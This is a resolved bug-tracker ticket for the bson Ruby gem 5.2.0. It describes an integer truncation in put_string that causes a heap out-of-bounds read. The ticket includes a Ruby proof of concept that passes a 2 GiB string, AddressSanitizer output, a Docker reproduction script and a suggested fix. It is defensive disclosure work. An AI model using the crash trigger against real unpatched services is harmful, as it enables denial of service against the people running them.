Type: Bug
Resolution: Fixed
Priority: Unknown
Fix Version/s: bson-5.2.1
Affects Version/s: None
Component/s: BSON
Labels: None
Confidence Status: None
Backwards Compatibility: Fully Compatible
Assigned Teams: Ruby Drivers
Documentation Changes: Not Needed
Aha! Reference: None
Tracking Level: None
Risk Status: None
Exec Notes: None
Goal Link: None
Goal Name(s): None

Summary

BSON::ByteBuffer#put_string truncates Ruby string lengths to int32_t before UTF-8 validation. A string of length 2**31 wraps negative, is converted to a huge size_t, and drives the native UTF-8 validator past the end of the heap allocation.

Affected version

Software: bson gem
Version: 5.2.0
Commit: dcae7f483a262305159ae8b2711cf359f7d9af65

Details

The native string encoder stores the result of RSTRING_LEN in an int32_t variable named length, even though Ruby strings can be larger than INT32_MAX bytes.

ext/bson/write.c:209

static VALUE pvt_bson_encode_to_utf8(VALUE string) {
  VALUE existing_encoding_name;
  VALUE encoding;
  VALUE utf8_string;
  const char *str;
  int32_t length;
...
    str = RSTRING_PTR(utf8_string);
    length = RSTRING_LEN(utf8_string);

    rb_bson_utf8_validate(str, length, true, "String");

RSTRING_LEN returns long, which is 64 bits wide on LP64 platforms such as 64-bit Linux and macOS. Assigning it to int32_t silently truncates any length of 2 GiB (2**31 bytes) or more. A string of exactly 2**31 bytes produces INT32_MIN (-2147483648). That value is passed directly to rb_bson_utf8_validate, whose second parameter is size_t:

ext/bson/libbson-utf8.c:105

void
rb_bson_utf8_validate (const char *utf8,
                       size_t utf8_len,
                       bool allow_null,
                       const char *data_type)
{
...
   for (i = 0; i < utf8_len; i += seq_length) {
      _bson_utf8_get_sequence (&utf8[i], &seq_length, &first_mask);

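The implicit conversion of a negative int32_t to size_t sign-extends: INT32_MIN becomes 2**64 - 2**31 (0xFFFFFFFF80000000) on a 64-bit host, a value near UINT64_MAX. The loop bound therefore no longer reflects the buffer size, the loop walks past the end of the string, and the first out-of-bounds access is the byte read in _bson_utf8_get_sequence: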

ext/bson/libbson-utf8.c:40

   unsigned char c = *(const unsigned char *) utf8;

Proof of concept

require "bson"

buffer = BSON::ByteBuffer.new
huge = "A" * (2**31)
warn huge.bytesize
buffer.put_string(huge)

AddressSanitizer output

==859==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xffff75bfe801
READ of size 1 at 0xffff75bfe801 thread T0
    #0 0xffff97dafa5c in _bson_utf8_get_sequence /tmp/src/ext/bson/libbson-utf8.c:40
    #1 0xffff97dafc78 in rb_bson_utf8_validate /tmp/src/ext/bson/libbson-utf8.c:121
    #2 0xffff97db71b8 in pvt_bson_encode_to_utf8 /tmp/src/ext/bson/write.c:226
    #3 0xffff97db73c8 in rb_bson_byte_buffer_put_string /tmp/src/ext/bson/write.c:243

0xffff75bfe801 is located 0 bytes to the right of 2147483649-byte region
SUMMARY: AddressSanitizer: heap-buffer-overflow /tmp/src/ext/bson/libbson-utf8.c:40
         in _bson_utf8_get_sequence

Reproduction

On a machine with Docker, run:

mkdir -p dfvuln-772-bson-put-string-oob
cd dfvuln-772-bson-put-string-oob
cat > poc_put_string_oob.rb <<'RUBY'
require "bson"

buffer = BSON::ByteBuffer.new
huge = "A" * (2**31)
warn huge.bytesize
buffer.put_string(huge)
RUBY

docker run --rm -v "$PWD":/work -w /work ruby:3.3-bookworm bash -lc '
set -eux
apt-get update -qq
apt-get install -y -qq git build-essential pkg-config >/dev/null
git clone --depth=1 https://github.com/mongodb/bson-ruby.git src
cd src
git rev-parse HEAD | tee /work/commit.txt
bundle config set path vendor/bundle
bundle install
cd ext/bson
make distclean >/dev/null 2>&1 || true
ruby extconf.rb --with-cflags="-O0 -g -fsanitize=address -fno-omit-frame-pointer" \
                --with-ldflags="-fsanitize=address"
make -j"$(nproc)"
cd ../..
cp ext/bson/bson_native.so lib/
ASAN_LIB=$(gcc -print-file-name=libasan.so)
set +e
LD_PRELOAD="$ASAN_LIB" \
  ASAN_OPTIONS="detect_leaks=0:abort_on_error=0:symbolize=1" \
  ruby -Ilib /work/poc_put_string_oob.rb 2>&1 | tee /work/asan.log
status=${PIPESTATUS[0]}
set -e
test "$status" -ne 0
grep -q "ERROR: AddressSanitizer: heap-buffer-overflow" /work/asan.log
'

This builds bson_native.so with ASan inside Docker, runs the PoC, and writes the raw sanitizer output to asan.log.

Independent confirmation

The report was reviewed against the current source tree at commit dcae7f483a262305159ae8b2711cf359f7d9af65. The defect is confirmed.

ext/bson/write.c contains two sites where RSTRING_LEN is assigned to int32_t: lines 214 and 241 (inside pvt_bson_encode_to_utf8 and rb_bson_byte_buffer_put_string respectively). On a 64-bit host, RSTRING_LEN returns long. The truncation is silent – no compiler warning, no runtime check. Passing the resulting negative value to rb_bson_utf8_validate (which takes size_t) is the direct cause of the out-of-bounds read described above.

Severity assessment

Low to Medium. The crash is real and reproducible as described. Practical exploitability is constrained by the requirement to allocate and pass a string of at least 2 GiB. MongoDB drivers enforce a 16 MB per-document limit at a higher layer, so this path is unreachable in standard MongoDB usage. In contexts where the bson gem is used directly and no upstream size limit is enforced, an attacker who can supply a large enough string could crash the process. The impact is a heap out-of-bounds read, not a write; reliable code execution is not a plausible outcome on hardened platforms.

Suggested fix

In both pvt_bson_encode_to_utf8 and rb_bson_byte_buffer_put_string, change the length variable from int32_t to long (matching RSTRING_LEN's return type). Add an explicit bounds check before calling rb_bson_utf8_validate and before writing the 4-byte length prefix (BSON string length is encoded as int32_t, so strings longer than INT32_MAX bytes are invalid BSON regardless):

long length = RSTRING_LEN(utf8_string);
if (length > INT32_MAX) {
    rb_raise(rb_eArgError, "String length %ld exceeds BSON maximum", length);
}

Assignee: Jamis Buck
Reporter: Jamis Buck
Votes: 0
Watchers: 1

Created: Jun 03 2026 03:51:55 PM UTC
Updated: Jun 08 2026 02:22:08 PM UTC
Resolved: Jun 08 2026 02:22:08 PM UTC
